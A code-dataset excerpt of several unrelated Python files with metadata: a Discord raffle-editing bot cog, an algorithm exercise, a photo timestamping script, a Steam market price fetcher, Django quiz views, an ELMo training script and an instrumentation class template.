raffle.\"))\n\n        await self.clean_guild_raffles(ctx)\n\n    @edit.command()\n    async def description(\n        self, ctx, raffle: RaffleFactoryConverter, *, description: Union[bool, str]\n    ):\n        \"\"\"Edit the description for a raffle.\n\n        Use `0` or `false` to remove this feature.\n\n        **Arguments:**\n            - `<raffle>` - The name of the raffle.\n            - `<description>` - The new description.\n        \"\"\"\n        async with self.config.guild(ctx.guild).raffles() as r:\n\n            
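# Red's Config async context manager writes r back on exit, so in-place edits persist\n            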
raffle_data = r.get(raffle, None)\n\n            if not description:\n                with contextlib.suppress(KeyError):\n                    del raffle_data[\"description\"]\n                return await ctx.send(_(\"Description removed from this raffle.\"))\n\n            elif description is True:\n                return await ctx.send(\n                    _('Please provide a number, or \"false\" to disable the description.')\n                )\n\n            else:\n                raffle_data[\"description\"] = description\n                await ctx.send(_(\"Description updated for this raffle.\"))\n\n        await self.clean_guild_raffles(ctx)\n\n    @edit.command()\n    async def stimer(self, ctx, raffle: RaffleFactoryConverter, suspense_timer: Union[int, bool]):\n        \"\"\"Edit the suspense timer for a raffle.\n\n        Use `0` or `false` to remove this feature.\n        This feature defaults to 2 seconds if not set.\n\n        **Arguments:**\n            - `` - The name of the raffle.\n            - `` - The new suspense timer.\n        \"\"\"\n        async with self.config.guild(ctx.guild).raffles() as r:\n\n            raffle_data = r.get(raffle, None)\n\n            if not suspense_timer:\n                with contextlib.suppress(KeyError):\n                    del raffle_data[\"suspense_timer\"]\n                return await ctx.send(_(\"Suspense timer reset to the default: 2 seconds.\"))\n\n            elif suspense_timer is True:\n                return await ctx.send(\n                    _('Please provide a number, or \"false\" to disable this feature.')\n                )\n\n            else:\n                if suspense_timer not in range(0, 11):\n                    return await ctx.send(_(\"New suspense timer must be a number between 0 and 10.\"))\n                raffle_data[\"suspense_timer\"] = suspense_timer\n                await ctx.send(_(\"Suspense timer updated for this raffle.\"))\n\n        await self.clean_guild_raffles(ctx)\n\n    @edit.command()\n    async def endaction(\n        self, ctx, raffle: RaffleFactoryConverter, *, on_end_action: Union[bool, str]\n    ):\n        \"\"\"Edit the on_end_action for a raffle.\n\n        Use `0` or `false` to remove this feature.\n\n        **Arguments:**\n            - `` - The name of the raffle.\n            - `` - The new action. 
Must be one of `end`, `remove_winner`, `remove_and_prevent_winner`, or `keep_winner`.\n        \"\"\"\n        async with self.config.guild(ctx.guild).raffles() as r:\n\n            raffle_data = r.get(raffle, None)\n\n            if not on_end_action:\n                with contextlib.suppress(KeyError):\n                    del raffle_data[\"on_end_action\"]\n                return await ctx.send(_(\"On end action reset to the default: `keep_winner`.\"))\n\n            elif on_end_action is True:\n                return await ctx.send(\n                    _('Please provide an action, or \"false\" to disable this feature.')\n                )\n\n            else:\n                if on_end_action not in (\n                    \"end\",\n                    \"remove_winner\",\n                    \"remove_and_prevent_winner\",\n                    \"keep_winner\",\n                ):\n                    return await ctx.send(\n                        _(\n                            \"Please provide one of `end`, `remove_winner`, `remove_and_prevent_winner`, or `keep_winner`.\"\n                        )\n                    )\n                raffle_data[\"on_end_action\"] = on_end_action\n                await ctx.send(_(\"On end action updated for this raffle.\"))\n\n        await self.clean_guild_raffles(ctx)\n\n    @edit.command()\n    async def maxentries(\n        self, ctx, raffle: RaffleFactoryConverter, maximum_entries: Union[int, bool]\n    ):\n        \"\"\"Edit the max entries requirement for a raffle.\n\n        Use `0` or `false` to disable this condition.\n\n        **Arguments:**\n            - `` - The name of the raffle.\n            - `` - The new maximum number of entries.\n        \"\"\"\n        async with self.config.guild(ctx.guild).raffles() as r:\n\n            raffle_data = r.get(raffle, None)\n\n            if not maximum_entries:\n                with contextlib.suppress(KeyError):\n                    del raffle_data[\"maximum_entries\"]\n                return await ctx.send(_(\"Maximum entries condition removed from this raffle.\"))\n\n            elif maximum_entries is True:\n                return await ctx.send(\n                    _('Please provide a number, or \"false\" to disable this condition.')\n                )\n\n            else:\n                raffle_data[\"maximum_entries\"] = maximum_entries\n                await ctx.send(_(\"Max entries requirement updated for this raffle.\"))\n\n        await self.clean_guild_raffles(ctx)\n\n    @edit.command()\n    async def endmessage(\n        self, ctx, raffle: RaffleFactoryConverter, *, end_message: Union[bool, str]\n    ):\n        \"\"\"Edit the end message of a raffle.\n\n        Once you provide an end message, you will have the chance\n        to add additional messages, which will be selected at random\n        when a winner is drawn.\n\n        Use `0` or `false` to disable this condition.\n\n        **Arguments:**\n            - `` - The name of the raffle.\n            - `` - The new ending message.\n        \"\"\"\n        async with self.config.guild(ctx.guild).raffles() as r:\n\n            raffle_data = r.get(raffle, None)\n\n            if not end_message:\n                with contextlib.suppress(KeyError):\n                    del raffle_data[\"end_message\"]\n                return await ctx.send(\n                    _(\"End message feature removed from this raffle. 
It will now use the default.\")\n )\n\n elif end_message is True:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable this condition.')\n )\n\n else:\n try:\n raffle_safe_member_scanner(end_message, \"end_message\")\n except InvalidArgument as e:\n return await ctx.send(format_traceback(e))\n\n message = _(\n \"Would you like to add additional end messages to be selected from at random?\"\n )\n\n can_react = ctx.channel.permissions_for(ctx.me).add_reactions\n if not can_react:\n message += \" (y/n)\"\n message = await ctx.send(message)\n if can_react:\n start_adding_reactions(message, ReactionPredicate.YES_OR_NO_EMOJIS)\n predicate = ReactionPredicate.yes_or_no(message, ctx.author)\n event_type = \"reaction_add\"\n else:\n predicate = MessagePredicate.yes_or_no(ctx)\n event_type = \"message\"\n\n try:\n await self.bot.wait_for(event_type, check=predicate, timeout=30)\n except asyncio.TimeoutError:\n await ctx.send(\n _(\n 'You took too long to respond. Saving end message as \"{}\".'.format(\n end_message\n )\n )\n )\n\n if predicate.result:\n interaction = await start_interactive_message_session(\n ctx, self.bot, \"end_message\", message\n )\n if interaction is False:\n data = end_message\n await ctx.send(\n _(\n \"End message set to what you provided previously: {}\".format(\n end_message\n )\n )\n )\n else:\n data = [end_message] + interaction\n await ctx.send(_(\"End messages updated for this raffle.\"))\n else:\n data = end_message\n await ctx.send(_(\"End message updated for this raffle.\"))\n raffle_data[\"end_message\"] = data\n\n await self.clean_guild_raffles(ctx)\n\n @edit.command()\n async def joinmessage(\n self, ctx, raffle: RaffleFactoryConverter, *, join_message: Union[bool, str]\n ):\n \"\"\"Edit the join message of a raffle.\n\n Once you provide a join message, you will have the chance\n to add additional messages, which will be selected at random\n when a user joins the raffle.\n\n Use `0` or `false` to disable this condition.\n\n **Arguments:**\n - `` - The name of the raffle.\n - `` - The new joining message.\n \"\"\"\n async with self.config.guild(ctx.guild).raffles() as r:\n\n raffle_data = r.get(raffle, None)\n\n if not join_message:\n with contextlib.suppress(KeyError):\n del raffle_data[\"join_message\"]\n return await ctx.send(\n _(\n \"Join message feature removed from this raffle. It will now use the default.\"\n )\n )\n\n elif join_message is True:\n return await ctx.send(\n _('Please provide a number, or \"false\" to disable this condition.')\n )\n\n else:\n try:\n raffle_safe_member_scanner(join_message, \"join_message\")\n except InvalidArgument as e:\n return await ctx.send(format_traceback(e))\n\n message = _(\n \"Would you like to add additional end messages to be selected from at random?\"\n )\n\n can_react = ctx.channel.permissions_for(ctx.me).add_reactions\n if not can_react:\n message += \" (y/n)\"\n message = await ctx.send(message)\n if can_react:\n start_adding_reactions(message, ReactionPredicate.YES_OR_NO_EMOJIS)\n predicate = ReactionPredicate.yes_or_no(message, ctx.author)\n event_type = \"reaction_add\"\n else:\n predicate = MessagePredicate.yes_or_no(ctx)\n event_type = \"message\"\n\n try:\n await self.bot.wait_for(event_type, check=predicate, timeout=30)\n except asyncio.TimeoutError:\n await ctx.send(\n _(\n 'You took too long to respond. 
Saving join message as \"{}\".'.format(\n                                join_message\n                            )\n                        )\n                    )\n\n                if predicate.result:\n                    interaction = await start_interactive_message_session(\n                        ctx, self.bot, \"join_message\", message\n                    )\n                    if interaction is False:\n                        data = join_message\n                        await ctx.send(\n                            _(\n                                \"Join message set to what you provided previously: {}\".format(\n                                    join_message\n                                )\n                            )\n                        )\n                    else:\n                        data = [join_message] + interaction\n                        await ctx.send(_(\"Join messages updated for this raffle.\"))\n                else:\n                    data = join_message\n                    await ctx.send(_(\"Join message updated for this raffle.\"))\n                raffle_data[\"join_message\"] = data\n\n        await self.clean_guild_raffles(ctx)\n\n    @edit.command()\n    async def fromyaml(self, ctx, raffle: RaffleFactoryConverter):\n        \"\"\"Edit a raffle directly from yaml.\n\n        **Arguments:**\n            - `` - The name of the raffle to edit.\n        \"\"\"\n        async with self.config.guild(ctx.guild).raffles() as r:\n\n            raffle_data = r.get(raffle, None)\n\n            existing_data = {\n                \"end_message\": raffle_data.get(\"end_message\", None),\n                \"join_message\": raffle_data.get(\"join_message\", None),\n                \"account_age\": raffle_data.get(\"account_age\", None),\n                \"server_join_age\": raffle_data.get(\"server_join_age\", None),\n                \"roles_needed_to_enter\": raffle_data.get(\"roles_needed_to_enter\", None),\n                \"badges_needed_to_enter\": raffle_data.get(\"badges_needed_to_enter\", None),\n                \"prevented_users\": raffle_data.get(\"prevented_users\", None),\n                \"allowed_users\": raffle_data.get(\"allowed_users\", None),\n                \"description\": raffle_data.get(\"description\", None),\n                \"maximum_entries\": raffle_data.get(\"maximum_entries\", None),\n                \"on_end_action\": raffle_data.get(\"on_end_action\", None),\n                \"suspense_timer\": raffle_data.get(\"suspense_timer\", None),\n            }\n\n            message = (\n                _(\n                    \"You're about to **edit an existing raffle**.\\n\\nThe `name` \"\n                    \"block cannot be edited through this command, it's preferred \"\n                    \"if you create a new raffle with the new name instead.\\nYou can end \"\n                    \"this raffle through using `{prefix}raffle end {raffle}`.\"\n                    \"\\nPlease consider reading the docs about the various \"\n                    \"conditional blocks if you haven't already.\\n\\n\".format(\n                        prefix=ctx.clean_prefix, raffle=raffle\n                    )\n                )\n                + self.docs\n            )\n\n            quotes = lambda x: f'\"{x}\"'\n            noedits = lambda x: _(\"{x} # Cannot be edited\".format(x=x))\n            relevant_data = [(\"name\", noedits(quotes(raffle)))]\n            for k, v in raffle_data.items():\n                if k in (\"owner\", \"entries\", \"created_at\"):\n                    # These are not user defined keys\n                    continue\n                if isinstance(v, str):\n                    v = quotes(v)\n                relevant_data.append((k, v))\n\n            message += _(\n                \"\\n\\n**Current settings:**\"\n                + box(\"\\n\".join(f\"{x[0]}: {x[1]}\" for x in relevant_data), lang=\"yaml\")\n            )\n            await ctx.send(message)\n\n            check = lambda x: x.channel == ctx.channel and x.author == ctx.author\n\n            try:\n                content = await self.bot.wait_for(\"message\", timeout=500, check=check)\n            except asyncio.TimeoutError:\n                with contextlib.suppress(discord.NotFound):\n                    await message.delete()\n                return\n\n            content = content.content\n            valid = validator(cleanup_code(content))\n\n            if not valid:\n                return await ctx.send(\n                    _(\n                        \"Please provide valid YAML. 
You can validate your raffle YAML using `{}raffle parse`.\".format(\n ctx.clean_prefix\n )\n )\n )\n\n valid[\"name\"] = raffle\n\n try:\n parser = RaffleManager(valid)\n parser.parser(ctx)\n except RaffleError as e:\n exc = cross(_(\"An exception occured whilst parsing your data.\"))\n return await ctx.send(exc + format_traceback(e))\n\n data = {\n \"owner\": raffle_data.get(\"owner\"),\n \"entries\": raffle_data.get(\"entries\"),\n }\n\n if raffle_data.get(\"created_at\", None):\n data[\"created_at\"] = raffle_data[\"created_at\"]\n\n conditions = {\n \"end_message\": valid.get(\"end_message\", None),\n \"join_message\": valid.get(\"join_message\", None),\n \"account_age\": valid.get(\"account_age\", None),\n \"server_join_age\": valid.get(\"server_join_age\", None),\n \"roles_needed_to_enter\": valid.get(\"roles_needed_to_enter\", None),\n \"badges_needed_to_enter\": valid.get(\"badges_needed_to_enter\", None),\n \"prevented_users\": valid.get(\"prevented_users\", None),\n \"allowed_users\": valid.get(\"allowed_users\", None),\n \"description\": valid.get(\"description\", None),\n \"maximum_entries\": valid.get(\"maximum_entries\", None),\n \"on_end_action\": valid.get(\"on_end_action\", None),\n \"suspense_timer\": valid.get(\"suspense_timer\", None),\n }\n\n for k, v in conditions.items():\n if v:\n data[k] = v\n\n async with self.config.guild(ctx.guild).raffles() as r:\n r[raffle] = data\n\n additions = []\n deletions = []\n changes = []\n\n for k, v in conditions.items():\n if v and not existing_data[k]:\n additions.append(k)\n continue\n if not v and existing_data[k]:\n deletions.append(k)\n continue\n if v != existing_data[k]:\n changes.append(k)\n continue\n\n if any([additions, deletions, changes]):\n message = \"\"\n if additions:\n message += _(\"Added:\\n\") + \"\\n\".join(f\"+ {a}\" for a in additions)\n if changes:\n message += _(\"\\n\\nEdited:\\n\") + \"\\n\".join(f\"> {c}\" for c in changes)\n if deletions:\n message += _(\"\\n\\nRemoved:\\n\") + \"\\n\".join(f\"- {d}\" for d in deletions)\n\n diffs = box(message, lang=\"diff\")\n update = tick(_(\"Raffle edited. {}\".format(diffs)))\n\n else:\n update = tick(_(\"No changes were made.\"))\n\n await ctx.send(update)\n\n await self.clean_guild_raffles(ctx)\n","sub_path":"raffle/commands/editor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566468343","text":"'''Min Operations\r\nStarting from the number 0, find the minimum number of operations \r\nrequired to reach a given positive target number. You can only use \r\nthe following two operations:\r\n\r\n1. Add 1\r\n2. 
Double the number'''\r\n\r\n'''For Target = 18, output = 6, because it takes at least 6 steps \r\nshown below to reach the target\r\n\r\nstart = 0\r\nstep 1 ==> 0 + 1 = 1\r\nstep 2 ==> 1 * 2 = 2 # or 1 + 1 = 2\r\nstep 3 ==> 2 * 2 = 4\r\nstep 4 ==> 4 * 2 = 8\r\nstep 5 ==> 8 + 1 = 9\r\nstep 6 ==> 9 * 2 = 18'''\r\n\r\ndef min_operation(target: int) -> int:\r\n    steps = 0\r\n    while target != 0:\r\n        while (target/2) == (target//2):\r\n            target = target //2 \r\n            steps +=1\r\n        \r\n        target -=1\r\n        steps +=1\r\n        \r\n    return steps\r\n\r\n\r\n# Test Cases\r\n\r\ndef test_function(test_case):\r\n    target = test_case[0]\r\n    solution = test_case[1]\r\n    output = min_operation(target)\r\n    \r\n    if output == solution:\r\n        print(\"Pass\")\r\n    else:\r\n        print(\"Fail\")\r\n\r\n\r\ntarget = 18\r\nsolution = 6\r\ntest_case = [target, solution]\r\ntest_function(test_case)","sub_path":"ds and algo/Greedy_Algo/min_operation.py","file_name":"min_operation.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586650978","text":"# This code is written for usage in subject TPR2251 Pattern Recognition. \r\n# You may modify the parameters to suit your needs\r\n# This code is a modified version of timestamp_png.py, to extract the creation time from the filename\r\n\r\n# See https://stackoverflow.com/a/39501288 for explanation on getting the creation time. \r\n# See https://pillow.readthedocs.io/en/stable/ for documentation of the PIL library\r\n\r\nimport os\r\nimport time\r\nimport re\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n\r\ndef timestamp_photo(input_photo, output_photo, text, pos):\r\n    \"\"\"\r\n    The timestamp_photo function takes four arguments; it draws text at pos on input_photo and saves the result as output_photo. \r\n    \r\n    You may modify the font family, font size and the font color according to your need. \r\n    \"\"\"\r\n    photo = Image.open(input_photo)\r\n\r\n    # make the image editable\r\n    drawing = ImageDraw.Draw(photo)\r\n\r\n    font = ImageFont.truetype(r\"C:\\Windows\\Fonts\\Arial.ttf\", 60)\r\n    drawing.text(pos, text, fill = \"black\", font = font) # change \"fill\" to white for images with dark background\r\n    photo.save(output_photo)\r\n\r\ndef photo_created_time(filename):\r\n    \"\"\"\r\n    The created_time function is used to return the creation time of the files based on the filename. \r\n    \r\n    My filename format: \"IMG_YYYYMMDD_HHMMSS.jpg\"\r\n    \"\"\"\r\n    basename = os.path.basename(filename)\r\n    formatted_basename = basename.split('_')\r\n    datetime = formatted_basename[1] + \" \" + formatted_basename[2][:-4] # [:-4] to exclude the file extension\r\n    return datetime\r\n\r\n\r\ncount = 1\r\nfor photo in os.listdir(\"Train Set\"): # change \"folder\" to the path to your folder\r\n    path = \"Train Set/\" + photo\r\n    created_time = photo_created_time(path)\r\n    output_name = \"Stamped/\" + str(count) + \".png\"\r\n    \r\n    timestamp_photo(path, output_name, str(created_time), pos=(5, 5))\r\n    count += 1\r\n    \r\nprint(\"All timestamp added. 
\")","sub_path":"timestamp_filename_png.py","file_name":"timestamp_filename_png.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"426839827","text":"import requests\nimport json\n\ndata = {}\nfile = 'price.json'\n\ndef fixed_name(item_name):\n return item_name.replace(' ', '%20')\n\ndef get_item(appid, item_name):\n r = requests.get('https://steamcommunity.com/market/priceoverview/?currency=1&appid={}&market_hash_name={}'.format(appid, fixed_name(item_name))).json()\n if(r['success'] == True):\n data[item_name] = {\n 'lowest_price': r['lowest_price'],\n 'median_price': r['median_price']\n }\n return data\n else:\n return False\n\ndef get_lowest_price(appid, item_name):\n r = requests.get('https://steamcommunity.com/market/priceoverview/?currency=1&appid={}&market_hash_name={}'.format(appid, fixed_name(item_name))).json()\n if(r['success'] == True):\n return r['lowest_price']\n else:\n return False\n\ndef get_median_price(appid, item_name):\n r = requests.get('https://steamcommunity.com/market/priceoverview/?currency=1&appid={}&market_hash_name={}'.format(appid, fixed_name(item_name))).json()\n if(r['success'] == True):\n return r['median_price']\n else:\n return False\n\ndef get_volume(appid, item_name):\n r = requests.get('https://steamcommunity.com/market/priceoverview/?currency=1&appid={}&market_hash_name={}'.format(appid, fixed_name(item_name))).json()\n if(r['success'] == True):\n return r['volume'].replace(',', '')\n else:\n return False\n\nitem = 'Mann Co. Supply Crate Key'\n\nprint(get_item(440, item))\nprint(get_volume(440, item))\nprint(get_lowest_price(440, item))\nprint(get_median_price(440, item))\n\nwith open(file, 'w') as outfile:\n json.dump(data, outfile, indent=4)\n","sub_path":"get_community_market_price.py","file_name":"get_community_market_price.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"579142514","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.views import generic\nfrom django.utils import timezone\nfrom django.forms import ModelForm\nimport pdb\n\nfrom creator.models import Quiz, Question, Choice\n\nclass IndexView(generic.ListView):\n template_name = 'creator/index.html'\n context_object_name = 'quiz_list'\n\n def get_queryset(self):\n return Quiz.objects.all()\n\nclass QuizView(generic.DetailView):\n model = Quiz\n template_name = 'creator/quiz_detail.html'\n\nclass QuestionView(generic.DetailView):\n model = Question\n template_name = 'creator/question_detail.html'\n\nclass QuizForm(ModelForm):\n class Meta:\n model = Quiz\n exclude = ('pub_date',)\n\nclass QuestionForm(ModelForm):\n class Meta:\n model = Question\n exclude = ('quiz',)\n\ndef add_quiz(request):\n if request.method == 'GET':\n form = QuizForm()\n else:\n # A POST request: Handle Form Upload\n # Bind data from request.POST into a PostForm\n form = QuizForm(request.POST)\n # If data is valid, proceeds to create a new post and redirect the user\n if form.is_valid():\n # pdb.set_trace()\n title = form.cleaned_data['title']\n author = form.cleaned_data['author']\n description = form.cleaned_data['description']\n pub_date = timezone.now()\n quiz = Quiz.objects.create(title=title, author=author, description=description, pub_date=pub_date)\n # Always return an 
HttpResponseRedirect after successfully dealing\n            # with POST data. This prevents data from being posted twice if a\n            # user hits the Back button.\n            return HttpResponseRedirect(reverse('creator:add_quiz_success'))\n    \n    return render(request, 'creator/add_quiz.html', {\n        'form': form,\n    })\n\ndef add_quiz_success(request):\n    return render(request, 'creator/add_quiz_success.html')\n\ndef delete_quiz(request, quiz_id):\n    q = Quiz.objects.get(pk=quiz_id)\n    for question in q.question_set.all():\n        for choice in question.choice_set.all():\n            choice.delete()\n        question.delete()\n    q.delete()\n    return HttpResponseRedirect(reverse('creator:delete_quiz_success'))\n\ndef delete_quiz_success(request):\n    return render(request, 'creator/delete_quiz_success.html')\n\ndef add_question(request, quiz_id):\n    quiz = Quiz.objects.get(pk=quiz_id)\n    if request.method == 'GET':\n        form = QuestionForm() \n    else:\n        form = QuestionForm(request.POST)\n        if form.is_valid():\n            text = form.cleaned_data['text']\n            question = Question.objects.create(text=text, quiz=quiz)\n            return HttpResponseRedirect(reverse('creator:quiz', args=(quiz_id,)))\n    return render(request, 'creator/add_question.html', {\n        'form': form,\n        'quiz': quiz\n    })","sub_path":"kukuba/creator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"159569629","text":"import argparse\nimport os\n\nimport sys\nsys.path.insert(0, os.path.abspath('.'))\nsys.path.insert(0, os.path.abspath('../'))\nsys.path.append(os.pardir)\n\nfrom bilm.training import train, load_vocab\nfrom bilm.data import BidirectionalLMDataset\nfrom train_config import config\n\n\ndef main(args):\n    # load the vocab\n    # longest token in the vocab = 10 syllables --> 30 characters after jamo decomposition\n    # bos char + 30 + eos char = 32\n    vocab = load_vocab(args.vocab_file, 32)\n\n    # define the options\n    # batch size for each GPU\n    batch_size = 64*2\n    n_gpus = 1\n\n    # number of unique tokens in the tokenized Science of Love KakaoTalk data (identified_corpus_20180105)\n    # (-> the total token count must be used here, not the unique token count)\n    # n_train_tokens = 609518\n    # n_train_tokens = 626932956 # number of tokens in 8000pair_tokenized_corpus.txt (620 million)\n    # token count used temporarily for now\n    n_train_tokens = 200000000\n\n    options = {\n        'bidirectional': True,\n        'char_cnn': {\n            'activation': 'tanh',\n            'embedding': {'dim': 16},\n            'filters': [[1, 32],\n                        [2, 32],\n                        [3, 64],\n                        [4, 128],\n                        [5, 256],\n                        [6, 512],\n                        [7, 1024]],\n            'max_characters_per_token': 32,\n            'n_characters': 62,\n            'n_highway': 2,\n        },\n        'dropout': 0.2,\n\n        'lstm': {\n            'cell_clip': 3,\n            'dim': 256,\n            'n_layers': 2,\n            'proj_clip': 3,\n            'projection_dim': 256,\n            'use_skip_connections': True,\n        },\n\n        'all_clip_norm_val': 10.0,\n        'n_epochs': 10,\n        'n_train_tokens': n_train_tokens,\n        'batch_size': batch_size,\n        'n_tokens_vocab': vocab.size,\n        'unroll_steps': 10,\n        'n_negative_samples_batch': 4096,\n    }\n\n    prefix = args.train_prefix\n    data = BidirectionalLMDataset(filepattern=prefix,\n                                  vocab=vocab,\n                                  test=False,\n                                  shuffle_on_load=True,\n                                  with_tab=False)\n    tf_save_dir = args.save_dir\n    tf_log_dir = args.save_dir\n    train(options,\n          data,\n          n_gpus,\n          tf_save_dir,\n          tf_log_dir,\n          restart_ckpt_file='/media/scatter/scatterdisk/elmo_ckpt/elmo_ckpt_0919_2142/model.ckpt_batch-625000')\n\n\nif __name__ == '__main__':\n    from datetime import datetime\n    os.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\n    BASE_DIR = config['BASE_DIR']\n    sol_paths_201801015 = config['sol_paths_201801015']\n    textat_paths_201801015 = config['textat_paths_201801015']\n    sol_data_pattern = 
os.path.join(BASE_DIR, sol_paths_201801015)\n    textat_data_pattern = os.path.join(BASE_DIR, textat_paths_201801015)\n    pingpong8000 = config['pingpong8000']\n    filepattern = [sol_data_pattern, textat_data_pattern]\n\n    now = datetime.now()\n    date_fmt = '{:%m%d_%H%M}'.format(now)\n    save_dir = config['save_dir'].format(date_fmt)\n    vocab_file = config['vocab_file']\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--save_dir', help='Location of checkpoint files', default=save_dir)\n    parser.add_argument('--vocab_file', help='Vocabulary file', default=vocab_file)\n    parser.add_argument('--train_prefix', help='Prefix for train files', default=pingpong8000) # pingpong 8000 pairs\n    # parser.add_argument('--train_prefix', help='Prefix for train files', default=filepattern) # sol/textat\n    args = parser.parse_args()\n\n    main(args)\n","sub_path":"bin/train_elmo.py","file_name":"train_elmo.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194413123","text":"\"\"\"\r\nXLevel delocalized instrumentation class\r\nauthor: Valentyn Stadnytskyi\r\nCreated: November 2017\r\nLast modified: March 7 2019\r\n\"\"\"\r\n\r\n__version__ = '0.0.2'\r\n\r\nimport traceback\r\nimport psutil, os\r\nimport platform #https://stackoverflow.com/questions/110362/how-can-i-find-the-current-os-in-python\r\np = psutil.Process(os.getpid()) #source: https://psutil.readthedocs.io/en/release-2.2.1/\r\n\r\n\r\nfrom numpy import nan, mean, std, nanstd, asfarray, asarray, hstack, array, concatenate, delete, round, vstack, hstack, zeros, transpose, split, unique, nonzero, take, savetxt, min, max\r\nfrom serial import Serial\r\nfrom time import time, sleep\r\nimport sys\r\nimport os.path\r\nimport struct\r\nfrom pdb import pm\r\nfrom time import gmtime, strftime, time\r\nfrom logging import debug,info,warning,error\r\n\r\n\r\nfrom struct import pack, unpack\r\nfrom timeit import Timer, timeit\r\n\r\nfrom threading import Thread, Event, Timer, Condition\r\nfrom datetime import datetime\r\n\r\nclass GUITemplate():\r\n    def __init__(self):\r\n        pass\r\n\r\n    def initGUI(self):\r\n        pass\r\n\r\nclass IndicatorsTemplate():\r\n\r\n    def __init__(self, object):\r\n        self.object = object\r\n        self.list = []\r\n\r\n    def keys(self):\r\n        if len(self.list) == 0:\r\n            self.list = list(self.get().keys())\r\n        return self.list\r\n\r\n    def get(self, value = None):\r\n        \"\"\"\r\n        returns a dictionary with all indicators. Every entry needs to\r\n        be added manually. 
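(Editor's note, not in the original source: the base template below registers only the b'running' indicator.) 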
This helps to organize what is available to the outside\r\n        requestor.\r\n        \"\"\"\r\n        dic = {}\r\n        dic[b'running'] = self.running\r\n\r\n        return dic\r\n\r\n\r\n\r\n    def get_running(self):\r\n        \"\"\"\r\n        default get_running function in the instrumentation library\r\n        \"\"\"\r\n        raise NotImplementedError\r\n        #return response\r\n    def set_running(self,value):\r\n        \"\"\"\r\n        default set_running function in the instrumentation library\r\n        \"\"\"\r\n        raise NotImplementedError\r\n    running = property(get_running,set_running)\r\n\r\nclass ControlsTemplate():\r\n    def __init__(self, object):\r\n        self.list = []\r\n        self.object = object\r\n\r\n    def keys(self):\r\n        if len(self.list) == 0:\r\n            self.list = list(self.get().keys())\r\n        return self.list\r\n\r\n\r\n    def get(self):\r\n        dic = {}\r\n        dic[b'variable'] = 0\r\n        return dic\r\n\r\n    def set(self,new_controls = [{b'temp':False}]):\r\n        for key in list(new_controls.keys()):\r\n            setattr(self,key.decode(\"utf-8\"),new_controls[key])\r\n        response = self.get()\r\n        return response\r\n\r\n    def get_variable(self):\r\n        try:\r\n            response = getattr(self.object,'variable')\r\n        except:\r\n            response = None #device.controls.running\r\n            warning(traceback.format_exc())\r\n        return response\r\n    def set_variable(self,value):\r\n        \"\"\"\r\n        indicators cannot be set from outside. This method is used to set\r\n        an indicator from other instances within this process.\r\n        \"\"\"\r\n        try:\r\n            setattr(self.object,'variable',value)\r\n        except:\r\n            error(traceback.format_exc())\r\n    variable = property(get_variable,set_variable)\r\n\r\n    def get_task_queue(self):\r\n        \"\"\"\r\n        \"\"\"\r\n        raise NotImplementedError\r\n\r\n    def set_task_queue(self,value):\r\n        \"\"\"\r\n        \"\"\"\r\n        raise NotImplementedError\r\n    task_queue = property(get_task_queue,set_task_queue)\r\n\r\n\r\n\r\n\r\nclass XLevelTemplate():\r\n\r\n    #inds = IndicatorsTemplate(self)\r\n    #ctrls = ControlsTemplate(self)\r\n    \"\"\"circular buffers dictionary contains information about all circular buffers and their type (Server, Client or Queue)\"\"\"\r\n    circular_buffers = {}\r\n\r\n    def __init__(self):\r\n        #Thread.__init__(self)\r\n        self.running = False\r\n        #self.daemon = False # OK for main thread to exit even if instance is still running\r\n        self.description = ''\r\n\r\n    def first_time_setup(self):\r\n        \"\"\"performs first-time setup\r\n        \"\"\"\r\n        raise NotImplementedError\r\n\r\n\r\n    def init(self, msg_in = None, client = None):\r\n        \"\"\"\r\n        does proper start of the XLevel code and can be called remotely\r\n        \"\"\"\r\n        raise NotImplementedError\r\n        response = {}\r\n        response[b'flag'] = flag\r\n        response[b'message'] = message\r\n        response[b'error'] = err\r\n        return response\r\n\r\n    def abort(self,msg_in = None, client = None):\r\n        \"\"\"aborts current operation\r\n        \"\"\"\r\n        raise NotImplementedError\r\n        response = {}\r\n        response[b'flag'] = flag\r\n        response[b'message'] = message\r\n        response[b'error'] = err\r\n        return response\r\n\r\n    def close(self,msg_in = None, client = None):\r\n        \"\"\"aborts and completely stops the XLevel code\r\n        \"\"\"\r\n        raise NotImplementedError\r\n\r\n        response = {}\r\n        response[b'flag'] = flag\r\n        response[b'message'] = message\r\n        response[b'error'] = err\r\n        return response\r\n\r\n\r\n\r\n    def help(self,msg_in = None, client = None):\r\n        \"\"\"\r\n        returns help information about this XLevel program\r\n\r\n        ####\r\n        EXAMPLE:\r\n        response = {}\r\n        response[b'name'] = self.name\r\n        response[b'controls'] = self.ctrls.get()\r\n        response[b'indicators'] = self.inds.get()\r\n        return response\r\n        
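(Editor's example, not in the original: with the defaults above, such a reply would look like {b'controls': {b'variable': 0}, b'indicators': {b'running': False}}.)\r\n        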
